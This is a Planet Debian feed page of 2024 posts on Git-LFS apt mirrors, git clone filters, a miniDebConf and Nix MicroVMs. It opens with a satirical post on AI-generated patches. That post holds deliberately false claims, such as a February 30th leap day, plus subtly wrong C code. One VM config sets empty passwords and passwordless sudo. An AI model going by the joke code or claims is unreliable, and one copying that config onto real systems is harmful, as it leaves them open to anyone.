Planet Debian
https://planet.debian.org/
Joey Hess: policy on adding AI generated content to my software projects
http://joeyh.name/blog/entry/policy_on_adding_AI_generated_content_to_my_software_projects/
<p>I am eager to incorporate your AI generated code into my software.
Really!</p>
<p>I want to facilitate making the process as easy as possible. You're already
using an AI to do most of the hard lifting, so why make the last step hard? To
that end, I skip my usually extensive code review process for your AI generated
code submissions. Anything goes as long as it compiles!</p>
<p>Please do remember to include "(AI generated)" in the description of your
changes (at the top), so I know to skip my usual review process.</p>
<p>Also be sure to sign off to the standard
<a href="https://developercertificate.org/">Developer Certificate of Origin</a>
so I know you attest that you own the code that you generated.
When making a git commit, you can do that by using the
<code>--signoff</code> <a href="https://git-scm.com/docs/git-commit#Documentation/git-commit.txt---signoff">option</a>.</p>
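<p>A minimal sketch of what that looks like in practice, in a throwaway repository (the file name and commit message are illustrative):</p>

```shell
# Create a disposable repository just to show the --signoff behavior
repo=$(mktemp -d)
cd "$repo"
git init -q
git config user.name "Jane Dev"
git config user.email "jane@example.com"
echo 'float fast_rsqrt(float number);' > fast_rsqrt.h
git add fast_rsqrt.h
# --signoff appends a Signed-off-by trailer, which is the DCO attestation
git commit -q --signoff -m "Add fast inverse square root (AI generated)"
# The last line of the commit message is now:
#   Signed-off-by: Jane Dev <jane@example.com>
git log -1 --format=%B
```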
<p>I do make some small modifications to AI generated submissions.
For example, maybe you used AI to write this code:</p>
<pre><code>+ // Fast inverse square root
+ float fast_rsqrt( float number )
+ {
+ float x2 = number * 0.5F;
+ float y = number;
+ long i = * ( long * ) &y;
+ i = 0x5f3659df - ( i >> 1 );
+ y = * ( float * ) &i;
+ return (y * ( 1.5F - ( x2 * y * y ) ));
+ }
...
- foo = rsqrt(bar)
+ foo = fast_rsqrt(bar)
</code></pre>
<p>Before AI, only a genius like John Carmack could write anything close to
this, and now you've generated it with some simple prompts to an AI.
So of course I will accept your patch. But as part of my QA process,
I might modify it so the new code is not run all the time. Let's only run
it on leap days to start with. As we know, leap day is February 30th, so I'll
modify your patch like this:</p>
<pre><code>- foo = rsqrt(bar)
+ time_t s = time(NULL);
+ if (localtime(&s)->tm_mday == 30 && localtime(&s)->tm_mon == 2)
+ foo = fast_rsqrt(bar);
+ else
+ foo = rsqrt(bar);
</code></pre>
<p>Despite my minor modifications, you did the work (with AI!) and so
you deserve the credit, so I'll keep you listed as the author.</p>
<p>Congrats, you made the world better!</p>
<p>PS: Of course, the other reason I don't review AI generated code is that I
simply don't have time and have to prioritize reviewing code written by
fallible humans. Unfortunately, this does mean that if you submit AI
generated code that is not clearly marked as such, and use my limited
reviewing time, I won't have time to review other submissions from you
in the future. I will still accept all your botshit submissions though!</p>
<p>PPS: Ignore the haters who claim that botshit makes AIs that get trained
on it less effective. Studies <a href="https://arxiv.org/abs/2305.17493">like this one</a>
just aren't believable. I asked Bing to summarize it and it said not to worry
about it!</p>
2024-03-18T20:54:59+00:00 Joey Hess

Simon Josefsson: Apt archive mirrors in Git-LFS
https://blog.josefsson.org/2024/03/18/apt-archive-mirrors-in-git-lfs/
<p>My effort to improve the transparency of and confidence in public apt archives continues. I started to work on this in “<a href="https://blog.josefsson.org/2023/02/01/apt-archive-transparency-debdistdiff-apt-canary/">Apt Archive Transparency</a>”, in which I mention the <a href="https://gitlab.com/debdistutils/debdistget/">debdistget</a> project in passing. <strong>Debdistget</strong> is responsible for mirroring index files for some public apt archives. I’ve realized that having a publicly auditable and preserved mirror of the apt repositories is central to being able to do apt transparency work, so the debdistget project has become more central to my project than I thought. Currently I track <a href="https://trisquel.info/">Trisquel</a>, <a href="https://pureos.net/">PureOS</a>, <a href="https://www.gnuinos.org/">Gnuinos</a> and their upstreams <a href="https://ubuntu.com/">Ubuntu</a>, <a href="https://www.debian.org/">Debian</a> and <a href="https://www.devuan.org/">Devuan</a>.</p>
<p>Debdistget downloads <strong>Release/Package/Sources</strong> files and stores them in a git repository published on <a href="https://about.gitlab.com/">GitLab</a>. Due to size constraints, it uses two repositories: one for the <strong>Release/InRelease</strong> files (which are small) and one that also includes the <strong>Package/Sources</strong> files (which are large). See for example the repository for <a href="https://gitlab.com/debdistutils/archives/trisquel/releases">Trisquel release files</a> and the <a href="https://gitlab.com/debdistutils/archives/trisquel/packages">Trisquel package/sources files</a>. Repositories for all distributions can be found in <a href="https://gitlab.com/debdistutils/archives">debdistutils’ archives GitLab sub-group</a>.</p>
<p>The reason for splitting into two repositories was that the git repository for the combined files became large, and that some of my use-cases only needed the release files. Currently the repositories with packages (which contain a couple of months’ worth of data now) are 9GB for <a href="https://gitlab.com/debdistutils/archives/ubuntu/packages">Ubuntu</a>, 2.5GB for <a href="https://gitlab.com/debdistutils/archives/trisquel/packages">Trisquel</a>/<a href="https://gitlab.com/debdistutils/archives/debian/packages">Debian</a>/<a href="https://gitlab.com/debdistutils/archives/pureos/packages">PureOS</a>, 970MB for <a href="https://gitlab.com/debdistutils/archives/devuan/packages">Devuan</a> and 450MB for <a href="https://gitlab.com/debdistutils/archives/gnuinos/packages">Gnuinos</a>. The repository size is correlated with the size of the archive (for the initial import) plus the frequency and size of updates. Ubuntu’s use of <a href="https://wiki.ubuntu.com/PhasedUpdates">Apt Phased Updates</a> (which triggers a higher churn of Packages file modifications) appears to be the primary reason for its larger size.</p>
<p>Working with large Git repositories is inefficient, and the GitLab CI/CD jobs generate quite some network traffic by downloading the git repository over and over again. The heaviest user is the <a href="https://gitlab.com/debdistutils/debdistdiff">debdistdiff</a> project, which downloads all distribution package repositories to do diff operations on the package lists between distributions. The daily job takes around <strong>80 minutes</strong> to run, with the majority of the time spent on downloading the archives. Yes, I know I could look into runner-side caching, but I dislike the complexity that caching introduces.</p>
<p>Fortunately not all use-cases require the package files. The <a href="https://gitlab.com/debdistutils/debdistcanary">debdistcanary</a> project only needs the <strong>Release/InRelease</strong> files, in order to commit signatures to the <a href="https://docs.sigstore.dev/">Sigstore</a> and <a href="https://www.sigsum.org/">Sigsum</a> transparency logs. These jobs still run fairly quickly, but watching the repository sizes grow worries me. Currently these repositories are at <a href="https://gitlab.com/debdistutils/canary/debian">Debian</a> 440MB, <a href="https://gitlab.com/debdistutils/canary/pureos">PureOS</a> 130MB, <a href="https://gitlab.com/debdistutils/canary/ubuntu">Ubuntu</a>/<a href="https://gitlab.com/debdistutils/canary/devuan">Devuan</a> 90MB, <a href="https://gitlab.com/debdistutils/canary/trisquel">Trisquel</a> 12MB and <a href="https://gitlab.com/debdistutils/canary/gnuinos">Gnuinos</a> 2MB. Here I believe the main size correlation is update frequency, and Debian is large because I track the volatile unstable suite.</p>
<p>So I hit a scalability wall with my first approach. A couple of months ago I “solved” this by discarding and resetting these archival repositories. The GitLab CI/CD jobs were fast again and all was well. However, this meant discarding precious historic information. A couple of days ago I was reaching the limits of practicality again, and started to explore ways to fix this. I like having data stored in git (it allows easy integration with software integrity tools such as <a href="https://gnupg.org/">GnuPG</a> and Sigstore, and the git log provides a kind of temporal ordering of the data), so moving to a traditional on-disk database felt like giving up these nice properties. Then I started to learn about <a href="https://git-lfs.com/">Git-LFS</a>, and understanding that it is able to <a href="https://devblogs.microsoft.com/bharry/the-largest-git-repo-on-the-planet/">handle multi-GB worth of data</a> looked promising.</p>
<p>Fairly quickly I scripted up a <a href="https://gitlab.com/debdistutils/debdistget/-/blob/main/ci-debdistget-dists.yml">GitLab CI/CD job</a> that incrementally updates the <strong>Release/Package/Sources</strong> files in a git repository that uses Git-LFS to store all the files. The repository size is now at <a href="https://gitlab.com/debdistutils/dists/ubuntu">Ubuntu 650kb</a>, <a href="https://gitlab.com/debdistutils/dists/debian">Debian 300kb</a>, <a href="https://gitlab.com/debdistutils/dists/trisquel">Trisquel 50kb</a>, <a href="https://gitlab.com/debdistutils/dists/devuan">Devuan 250kb</a>, <a href="https://gitlab.com/debdistutils/dists/pureos">PureOS 172kb</a> and <a href="https://gitlab.com/debdistutils/dists/gnuinos">Gnuinos 17kb</a>. As can be expected, jobs are quick to clone the git archives: <a href="https://gitlab.com/debdistutils/debdistdiff/-/pipelines">debdistdiff pipelines</a> went from a <strong>run-time of 80 minutes down to 10 minutes</strong>, which correlates more reasonably with the archive size and CPU run-time.</p>
<p>The LFS storage size for those repositories is at <a href="https://gitlab.com/debdistutils/dists/ubuntu">Ubuntu 15GB</a>, <a href="https://gitlab.com/debdistutils/dists/debian">Debian 8GB</a>, <a href="https://gitlab.com/debdistutils/dists/trisquel">Trisquel 1.7GB</a>, <a href="https://gitlab.com/debdistutils/dists/devuan">Devuan 1.1GB</a> and <a href="https://gitlab.com/debdistutils/dists/pureos">PureOS</a>/<a href="https://gitlab.com/debdistutils/dists/gnuinos">Gnuinos</a> 420MB. This is for a couple of days’ worth of data. It seems native Git is better at compressing/deduplicating data than Git-LFS is: the combined size for Ubuntu is already 15GB for a couple of days of data, compared to 8GB for a couple of months’ worth of data with pure Git. This may be a sub-optimal implementation of Git-LFS in GitLab, but it does worry me that this new approach will be difficult to scale too. At some level the difference is understandable: Git-LFS probably stores two different <strong>Packages</strong> files — around 90MB each for Trisquel — as two 90MB files, whereas native Git would store one compressed version of the 90MB file plus one relatively small patch to turn the old file into the next one. So the Git-LFS approach surprisingly scales less well for overall storage size. Still, the original repository is much smaller, and you usually don’t have to pull all LFS files anyway. So it is a net win.</p>
<p>Throughout this work, I kept thinking about how my approach relates to <a href="https://snapshot.debian.org/">Debian’s snapshot service</a>. Ultimately, what I would want is a combination of these two services. To have a good foundation for transparency work, I would want a collection of all <strong>Release/Packages/Sources</strong> files ever published, and ultimately also the source code and binaries. While it makes sense to start with the latest stable releases of distributions, this effort should scale backwards in time as well. For reproducing binaries from source code, I need to be able to securely find earlier versions of the binary packages used for rebuilds. So I need to import all the <strong>Release/Packages/Sources</strong> files from snapshot into my repositories. The latency to retrieve files from that server is high, so I haven’t been able to find an efficient/parallelized way to download them. If I am able to finish this, I will have confidence that my new Git-LFS based approach to storing these files can scale over many years to come. This remains to be seen. Perhaps the repository has to be split up per release, per architecture, or similar.</p>
<p>Another factor is storage costs. While the git repository size for a Git-LFS based repository with files from several years may be possible to sustain, the Git-LFS storage size surely won’t be. It seems GitLab charges the same for files in repositories and in Git-LFS, around <strong>$500 per 100GB</strong> per year. It may be possible to set up a separate Git-LFS backend not hosted at GitLab to serve the LFS files. Does anyone know of a suitable server implementation for this? I had a quick look at the <a href="https://github.com/git-lfs/git-lfs/wiki/Implementations">Git-LFS implementation list</a> and it seems the closest reasonable approach would be to set up the Gitea-clone <a href="https://forgejo.org/">Forgejo</a> as a self-hosted server. Perhaps a cloud storage approach à la S3 is the way to go? The cost to host this on GitLab would be manageable for up to <strong>~1TB ($5000/year)</strong>, but scaling it to, say, <strong>500TB</strong> of data would mean a yearly fee of <strong>$2.5M</strong>, which seems like poor value for the money.</p>
<p>I realized that ultimately I would want a git repository locally with the entire content of all apt archives, including their binary and source packages, ever published. The storage requirements for a service like snapshot (~300TB of data?) are not prohibitively expensive today: 20TB disks are $500 a piece, so a storage enclosure with 36 disks would be around <strong>$18,000 for 720TB</strong>, and using RAID1 means 360TB, which is a good start. While I have heard about ~TB-sized Git-LFS repositories, would Git-LFS scale to 1PB? Perhaps the size of a git repository with many millions of Git-LFS pointer files will become unmanageable? To get started on this approach, I decided to import a mirror of <strong>Debian’s bookworm for amd64</strong> into a Git-LFS repository. That is around <strong>175GB</strong>, so reasonably cheap to host even on GitLab ($1000/year for 200GB). Having this repository publicly available will make it possible to write software that uses this approach (e.g., porting <a href="https://gitlab.com/debdistutils/debdistreproduce">debdistreproduce</a>), to find out if this is useful and if it can scale. Distributing the apt repository via Git-LFS would also enable other interesting ideas for protecting the data. Consider configuring apt to use a local <strong>file://</strong> URL to this git repository, and verifying the git checkout using some method similar to <a href="https://archive.fosdem.org/2023/schedule/event/security_where_does_that_code_come_from/">Guix’s approach to trusting git</a> content or <a href="https://github.com/sigstore/gitsign">Sigstore’s gitsign</a>.</p>
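<p>As a sketch of that idea, an apt sources entry pointing at a local checkout of such a mirror could look like the following (the checkout path <tt>/srv/mirror/debian</tt> is an assumption; the keyring path is the standard Debian archive keyring location):</p>

```
# /etc/apt/sources.list.d/local-git-mirror.list (hypothetical)
# Points apt at a local git checkout of the Git-LFS mirror; Release file
# signatures are still verified against the archive keyring.
deb [signed-by=/usr/share/keyrings/debian-archive-keyring.gpg] file:///srv/mirror/debian bookworm main
deb-src [signed-by=/usr/share/keyrings/debian-archive-keyring.gpg] file:///srv/mirror/debian bookworm main
```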
<p>A naive push of the <strong>175GB</strong> archive in a single git commit ran into pack size limitations:</p>
<p><code>remote: fatal: pack exceeds maximum allowed size (4.88 GiB)</code></p>
<p>However, breaking up the commit into smaller commits for parts of the archive made it possible to push the entire archive. Here are the commands used to create this repository:</p>
<pre><code>git init
git lfs install
git lfs track 'dists/**' 'pool/**'
git add .gitattributes
git commit -m"Add Git-LFS track attributes." .gitattributes
time debmirror --method=rsync --host ftp.se.debian.org --root :debian --arch=amd64 --source --dist=bookworm,bookworm-updates --section=main --verbose --diff=none --keyring /usr/share/keyrings/debian-archive-keyring.gpg --ignore .git .
git add dists project
git commit -m"Add." -a
git remote add origin git@gitlab.com:debdistutils/archives/debian/mirror.git
git push --set-upstream origin --all
for d in pool/*/*; do
  echo $d;
  time git add $d;
  git commit -m"Add $d." -a
  git push
done
</code></pre>
<p>The <a href="https://gitlab.com/debdistutils/archives/debian/mirror">resulting repository</a> size is around 27MB, with Git-LFS object storage around 174GB. I think this approach would scale to handle all architectures for one release, but working with a single git repository for all releases and all architectures may lead to a git repository that is too large (&gt;1GB). So maybe one repository per release? These repositories could also be split up on a subset of <strong>pool/</strong> files, or there could be one repository per release per architecture or sources.</p>
<p>Finally, I have concerns about using SHA-1 for identifying objects. It seems both Git and Debian’s snapshot service are currently using SHA-1. For Git there is a <a href="https://git-scm.com/docs/hash-function-transition">SHA-256 transition</a> plan, and it seems GitLab is working on support for SHA-256-based repositories. For serious long-term deployment of these concepts, it would be nice to go for SHA-256 identifiers directly. Git-LFS already uses SHA-256, but Git internally uses SHA-1, as does the Debian snapshot service.</p>
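<p>Git’s SHA-256 object format can already be tried out locally (a sketch; this requires git 2.29 or newer, and such repositories do not yet interoperate with SHA-1 repositories or most hosting services):</p>

```shell
# Create a repository that uses the SHA-256 object format
repo=$(mktemp -d)
git init --object-format=sha256 "$repo"
# Confirm which hash function the repository uses
git -C "$repo" rev-parse --show-object-format   # prints: sha256
```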
<p>What do you think? Happy Hacking!</p>
2024-03-18T16:15:49+00:00 simon

Christoph Berg: vcswatch and git --filter
https://www.df7cb.de/blog/2024/vcswatch-git-filter.html
<p>Debian is running a "<a href="https://qa.debian.org/cgi-bin/vcswatch">vcswatch</a>"
service that keeps track of the status of all packaging repositories that have a
<a href="https://www.debian.org/doc/manuals/developers-reference/best-pkging-practices.de.html#vcs"><tt>Vcs-Git</tt></a>
(and other VCSes) header set and shows which repos might need a package upload to push pending changes out.</p>
<p>Naturally, this is a lot of data and the scratch partition on qa.debian.org
had to be expanded several times, up to 300 GB in the last iteration.
Attempts to reduce that size using shallow clones (<tt>git clone --depth=50</tt>)
did not save more than a few percent of space. Running <tt>git gc</tt> on
all repos helps a bit, but is tedious and as Debian is growing, the repos are
still growing both in size and number. I ended up blocking all repos with
checkouts larger than a gigabyte, and still the only cure was expanding the
disk, or lowering the blocking threshold.</p>
<p>Since we only need a tiny bit of info from the repositories, namely the content
of <tt>debian/changelog</tt> and a few other files from <tt>debian/</tt>, plus
the number of commits since the last tag on the packaging branch, it made sense
to try to get the info without fetching a full repo clone. The question if we
could grab that solely using the GitLab API at salsa.debian.org was never
really answered. But then, in <a href="https://bugs.debian.org/1032623">#1032623</a>,
Gábor Németh suggested the use of
<a href="https://git-scm.com/docs/git-clone#Documentation/git-clone.txt---filterltfilter-specgt"><tt>git clone --filter blob:none</tt></a>.
As things go, this sat unattended in the bug report for almost a year until the
next "disk full" event made me give it a try.</p>
<p>The <tt>blob:none</tt> filter makes git clone omit all files, fetching only commit and
tree information. Any blob (file content) needed at git run time is
transparently fetched from the upstream repository, and stored locally. It
turned out to be a game-changer. The (largish) repositories I tried it on
shrank to 1/100 of the original size.</p>
<p>Poking around I figured we could even do better by using <tt>tree:0</tt> as
filter. This additionally omits all trees from the git clone, again only
fetching the information at run time when needed. Some of the larger repos I
tried it on shrank to <em>1/1000</em> of their original size.</p>
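<p>For reference, a self-contained sketch of both filters against a throwaway local repository (with a real server such as salsa.debian.org only the clone URL changes; the server side must allow filters via <tt>uploadpack.allowFilter</tt>, which GitLab-based hosts do):</p>

```shell
# Build a small throwaway repository to clone from
src=$(mktemp -d)
git init -q "$src"
git -C "$src" config user.name "Test"
git -C "$src" config user.email "test@example.com"
echo "content" > "$src/file"
git -C "$src" add file
git -C "$src" commit -qm "initial commit"
# Allow partial-clone filters on the "server" side
git -C "$src" config uploadpack.allowfilter true

dst=$(mktemp -d)
# blob:none: omit all file contents; blobs are fetched lazily on demand
git clone -q --filter=blob:none "file://$src" "$dst/blobless"
# tree:0: additionally omit all trees; even smaller on large histories
git clone -q --filter=tree:0 "file://$src" "$dst/treeless"
```

The checkout still works in both clones because the missing objects are transparently fetched from the promisor remote when needed.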
<p>I deployed the new option on qa.debian.org and scheduled all repositories to
fetch a new clone on the next scan:</p>
<p><img src="https://www.df7cb.de/blog/2024/df-month.png" /></p>
<p>The initial dip from 100% to 95% is my first "what happens if we block repos
> 500 MB" attempt. Over the week after that, the git filter clones reduce the
overall disk consumption from almost 300 GB to 15 GB, a factor of <em>1/20</em>. Some
repos shrank from GBs to below a MB.</p>
<p>Perhaps I should make all my git clones use one of the filters.</p>
2024-03-18T12:45:40+00:00 Christoph Berg

Gunnar Wolf: After miniDebConf Santa Fe
https://gwolf.org/2024/03/after-minidebconf-santa-fe.html
<p>Last week we held our promised miniDebConf in Santa Fe City, Santa Fe province,
Argentina — just across the river from Paraná, where I have spent almost six
beautiful months I will never forget.</p>
<p><a href="https://gwolf.org/files/2024-03/mate.jpg">
<img align="left" height="203" src="https://gwolf.org/files/2024-03/mate.200.jpg" style="clear: both; padding: 1em;" width="200" />
</a></p>
<p>Around 500 Kilometers North from Buenos Aires, Santa Fe and Paraná are separated
by the beautiful and majestic <em>Paraná</em> river, which flows from Brazil, marks the
Eastern border of Paraguay, and continues within Argentina as the heart of the
<em>litoral</em> region of the country, until it merges with the <em>Uruguay</em> river (you
guessed right — the river marking the Eastern border of Argentina, first with
Brazil and then with Uruguay), and they become the <em>Río de la Plata</em>.</p>
<p><a href="https://gwolf.org/files/2024-03/during_talks.jpg">
<img align="right" height="106" src="https://gwolf.org/files/2024-03/during_talks.200.jpg" style="clear: both; padding: 1em;" width="200" />
</a></p>
<p>This was a short miniDebConf: we were lent the <em>APUL</em> union’s building for the
weekend (thank you very much!). On Saturday we had a cycle of talks, and on
Sunday we followed more of a hacklab logic, with some unstructured time to work
each on our own projects, and to talk and have a good time together.</p>
<p><a href="https://gwolf.org/files/2024-03/dds.jpg">
<img align="left" height="138" src="https://gwolf.org/files/2024-03/dds.200.jpg" style="clear: both; padding: 1em;" width="200" />
</a></p>
<p>We were five Debian people attending:
<code class="highlighter-rouge">{santiago|debacle|eamanu|dererk|gwolf}@debian.org</code>. My main contact for
kickstarting the organization was Martín Bayo. Martín was for many years the leader of
the <a href="https://www.unl.edu.ar/carreras/tecnicatura-universitaria-en-software-libre/">Technical Degree on Free Software at Universidad Nacional del
Litoral</a>,
where I was also a teacher for several years. Together with Leo Martínez, also a
teacher at the <em>tecnicatura</em>, he put us in contact with Guillermo and Gabriela,
from APUL, the non-teaching-staff union of said university.</p>
<p><a href="https://gwolf.org/files/2024-03/guille_graba.jpg">
<img align="right" height="115" src="https://gwolf.org/files/2024-03/guille_graba.200.jpg" style="clear: both; padding: 1em;" width="200" />
</a></p>
<p>We had the following set of talks. APUL was kind enough to record them, and
there is a promise that I will get the electronic recordings; of course, I will
push them to our usual conference video archiving service as soon as I get them.</p>
<table>
<thead>
<tr>
<th><strong>Hour</strong></th>
<th><strong>Title (Spanish)</strong></th>
<th><strong>Title (English)</strong></th>
<th><strong>Presented by</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>10:00-10:25</td>
<td>Introducción al Software Libre</td>
<td>Introduction to Free Software</td>
<td>Martín Bayo</td>
</tr>
<tr>
<td>10:30-10:55</td>
<td>Debian y su comunidad</td>
<td>Debian and its community</td>
<td>Emanuel Arias</td>
</tr>
<tr>
<td>11:00-11:25</td>
<td>¿Por qué sigo contribuyendo a Debian después de 20 años?</td>
<td>Why am I still contributing to Debian after 20 years?</td>
<td>Santiago Ruano</td>
</tr>
<tr>
<td>11:30-11:55</td>
<td>Mi identidad y el proyecto Debian: ¿Qué es el llavero OpenPGP y por qué?</td>
<td>My identity and the Debian project: What is the OpenPGP keyring and why?</td>
<td>Gunnar Wolf</td>
</tr>
<tr>
<td>12:00-13:00</td>
<td>Explorando las masculinidades en el contexto del Software Libre</td>
<td>Exploring masculinities in the context of Free Software</td>
<td>Gora Ortiz Fuentes - José Francisco Ferro</td>
</tr>
<tr>
<td>13:00-14:30</td>
<td><strong>Lunch</strong></td>
<td> </td>
<td> </td>
</tr>
<tr>
<td>14:30-14:55</td>
<td>Debian para el día a día</td>
<td>Debian for our every day</td>
<td>Leonardo Martínez</td>
</tr>
<tr>
<td>15:00-15:25</td>
<td>Debian en las Raspberry Pi</td>
<td>Debian on the Raspberry Pi</td>
<td>Gunnar Wolf</td>
</tr>
<tr>
<td>15:30-15:55</td>
<td>Device Trees</td>
<td>Device Trees</td>
<td>Lisandro Damián Nicanor Perez Meyer (videoconference)</td>
</tr>
<tr>
<td>16:00-16:25</td>
<td>Python en Debian</td>
<td>Python in Debian</td>
<td>Emmanuel Arias</td>
</tr>
<tr>
<td>16:30-16:55</td>
<td>Debian y XMPP en la medición de viento para la energía eólica</td>
<td>Debian and XMPP for wind measuring for eolic energy</td>
<td>Martin Borgert</td>
</tr>
</tbody>
</table>
<p>As it always happens… DebConf, miniDebConf and other Debian-related activities
are always fun, always productive, always a great opportunity to meet our
decades-long friends again. Let’s see what comes next!</p>
2024-03-18T04:00:25+00:00 Gunnar Wolf

Thomas Koch: Minimal overhead VMs with Nix and MicroVM
https://blog.koch.ro/posts/2024-03-17-minimal-vms-nix-microvm.html
<div class="info">
Posted on March 17, 2024
</div>
<div class="info">
Tags: <a href="https://blog.koch.ro/tags/debian.html" title="All pages tagged 'debian'.">debian</a>, <a href="https://blog.koch.ro/tags/free%20software.html" title="All pages tagged 'free software'.">free software</a>, <a href="https://blog.koch.ro/tags/nix.html" title="All pages tagged 'nix'.">nix</a>
</div>
<p>Joachim Breitner wrote about a <a href="https://www.joachim-breitner.de/blog/812-Convenient_sandboxed_development_environment">Convenient sandboxed development environment</a> and thus reminded me to blog about <a href="https://github.com/astro/microvm.nix">MicroVM</a>. I’ve toyed around with it a little but not yet seriously used it as I’m currently not coding.</p>
<p>MicroVM is a nix-based project to configure and run minimal VMs. It can mount and thus reuse the host’s nix store inside the VM, and thus has a very small disk footprint. I use MicroVM on a Debian system with the nix package manager.</p>
<p>The MicroVM author uses the project to host production services. Apart from that, I consider it a nice way to learn about NixOS after having started with the nix package manager and before making the big step to NixOS as one’s main system.</p>
<p>The guest’s root filesystem is a tmpdir, so one must explicitly define folders that should be mounted from the host and thus be persistent across VM reboots.</p>
<p>I defined the VM as a nix flake, since this is how I started from the MicroVM project’s example:</p>
<pre><code>{
  description = "Haskell dev MicroVM";
  inputs.impermanence.url = "github:nix-community/impermanence";
  inputs.microvm.url = "github:astro/microvm.nix";
  inputs.microvm.inputs.nixpkgs.follows = "nixpkgs";
  outputs = { self, impermanence, microvm, nixpkgs }:
    let
      persistencePath = "/persistent";
      system = "x86_64-linux";
      user = "thk";
      vmname = "haskell";
      nixosConfiguration = nixpkgs.lib.nixosSystem {
        inherit system;
        modules = [
          microvm.nixosModules.microvm
          impermanence.nixosModules.impermanence
          ({ pkgs, ... }: {
            environment.persistence.${persistencePath} = {
              hideMounts = true;
              users.${user} = {
                directories = [
                  "git" ".stack"
                ];
              };
            };
            environment.sessionVariables = {
              TERM = "screen-256color";
            };
            environment.systemPackages = with pkgs; [
              ghc
              git
              (haskell-language-server.override { supportedGhcVersions = [ "94" ]; })
              htop
              stack
              tmux
              tree
              vcsh
              zsh
            ];
            fileSystems.${persistencePath}.neededForBoot = nixpkgs.lib.mkForce true;
            microvm = {
              forwardPorts = [
                { from = "host"; host.port = 2222; guest.port = 22; }
                { from = "guest"; host.port = 5432; guest.port = 5432; } # postgresql
              ];
              hypervisor = "qemu";
              interfaces = [
                { type = "user"; id = "usernet"; mac = "00:00:00:00:00:02"; }
              ];
              mem = 4096;
              shares = [
                {
                  # use "virtiofs" for MicroVMs that are started by systemd
                  proto = "9p";
                  tag = "ro-store";
                  # the host's /nix/store will be picked up so that no
                  # squashfs/erofs will be built for it.
                  source = "/nix/store";
                  mountPoint = "/nix/.ro-store";
                }
                {
                  proto = "virtiofs";
                  tag = "persistent";
                  source = "~/.local/share/microvm/vms/${vmname}/persistent";
                  mountPoint = persistencePath;
                  socket = "/run/user/1000/microvm-${vmname}-persistent";
                }
              ];
              socket = "/run/user/1000/microvm-control.socket";
              vcpu = 3;
              volumes = [];
              writableStoreOverlay = "/nix/.rwstore";
            };
            networking.hostName = vmname;
            nix.enable = true;
            nix.nixPath = ["nixpkgs=${builtins.storePath <nixpkgs>}"];
            nix.settings = {
              extra-experimental-features = ["nix-command" "flakes"];
              trusted-users = [user];
            };
            security.sudo = {
              enable = true;
              wheelNeedsPassword = false;
            };
            services.getty.autologinUser = user;
            services.openssh = {
              enable = true;
            };
            system.stateVersion = "24.11";
            systemd.services.loadnixdb = {
              description = "import host's nix database";
              path = [pkgs.nix];
              wantedBy = ["multi-user.target"];
              requires = ["nix-daemon.service"];
              script = "cat ${persistencePath}/nix-store-db-dump|nix-store --load-db";
            };
            time.timeZone = nixpkgs.lib.mkDefault "Europe/Berlin";
            users.users.${user} = {
              extraGroups = [ "wheel" "video" ];
              group = "user";
              isNormalUser = true;
              openssh.authorizedKeys.keys = [
                "ssh-rsa REDACTED"
              ];
              password = "";
            };
            users.users.root.password = "";
            users.groups.user = {};
          })
        ];
      };
    in {
      packages.${system}.default = nixosConfiguration.config.microvm.declaredRunner;
    };
}
</code></pre>
<p>I start the MicroVM with a templated systemd user service:</p>
<pre><code>[Unit]
Description=MicroVM for Haskell development
Requires=microvm-virtiofsd-persistent@%i.service
After=microvm-virtiofsd-persistent@%i.service
AssertFileNotEmpty=%h/.local/share/microvm/vms/%i/flake/flake.nix
[Service]
Type=forking
ExecStartPre=/usr/bin/sh -c "[ /nix/var/nix/db/db.sqlite -ot %h/.local/share/microvm/nix-store-db-dump ] || nix-store --dump-db >%h/.local/share/microvm/nix-store-db-dump"
ExecStartPre=ln -f -t %h/.local/share/microvm/vms/%i/persistent/ %h/.local/share/microvm/nix-store-db-dump
ExecStartPre=-%h/.local/state/nix/profile/bin/tmux new -s microvm -d
ExecStart=%h/.local/state/nix/profile/bin/tmux new-window -t microvm: -n "%i" "exec %h/.local/state/nix/profile/bin/nix run --impure %h/.local/share/microvm/vms/%i/flake"
</code></pre>
<p>The above service definition creates a dump of the host’s nix store db so that it can be imported in the guest. This is necessary so that the guest can actually use what is available in /nix/store. There is an <a href="https://github.com/NixOS/rfcs/pull/152#issuecomment-1979117890">effort for an overlayed nix store</a> that would be preferable to this hack.</p>
<p>Finally, the MicroVM is started inside a tmux session named “microvm”. This way I can use the VM via SSH or through the console, and also access the qemu console.</p>
<p>And for completeness, the virtiofsd service:</p>
<pre><code>[Unit]
Description=serve host persistent folder for dev VM
AssertPathIsDirectory=%h/.local/share/microvm/vms/%i/persistent
[Service]
ExecStart=%h/.local/state/nix/profile/bin/virtiofsd \
--socket-path=${XDG_RUNTIME_DIR}/microvm-%i-persistent \
--shared-dir=%h/.local/share/microvm/vms/%i/persistent \
--gid-map :995:%G:1: \
--uid-map :1000:%U:1:
</code></pre>
2024-03-17T10:13:40+00:00 Thomas Koch

Thomas Koch: Rebuild search with trust
https://blog.koch.ro/posts/2024-01-20-rebuild-search-with-trust.html
<div class="info">
Posted on January 20, 2024
</div>
<div class="info">
Tags: <a href="https://blog.koch.ro/tags/debian.html" title="All pages tagged 'debian'.">debian</a>, <a href="https://blog.koch.ro/tags/free%20software.html" title="All pages tagged 'free software'.">free software</a>, <a href="https://blog.koch.ro/tags/life.html" title="All pages tagged 'life'.">life</a>, <a href="https://blog.koch.ro/tags/search.html" title="All pages tagged 'search'.">search</a>, <a href="https://blog.koch.ro/tags/decentralization.html" title="All pages tagged 'decentralization'.">decentralization</a>
</div>
<p>Finally, there is a thing people can agree on:</p>
<ul>
<li>2023-08-28, OSNews: <a href="https://www.osnews.com/story/136829/the-end-of-the-googleverse/">The end of the Googleverse</a></li>
<li>2023-07-28, Cory Doctorow: <a href="https://pluralistic.net/2023/07/28/microincentives-and-enshittification/">Microincentives and Enshittification</a></li>
<li>2023-10-03, Cory Doctorow: <a href="https://pluralistic.net/2023/10/03/not-feeling-lucky/">Google’s enshittification memos</a></li>
<li>2024-01-15, Tim Bray: <a href="https://www.tbray.org/ongoing/When/202x/2024/01/15/Google-2024">Mourning Google</a></li>
</ul>
<p>Apparently, Google Search is not good anymore. And I’m not the only one thinking about decentralization to fix it:</p>
<p><a href="https://media.ccc.de/v/37c3-lightningtalks-58060-honey-i-federated-the-search-engine-finding-stuff-online-post-big-tech">Honey I federated the search engine - finding stuff online post-big tech</a> - a lightning talk at the recent chaos communication congress</p>
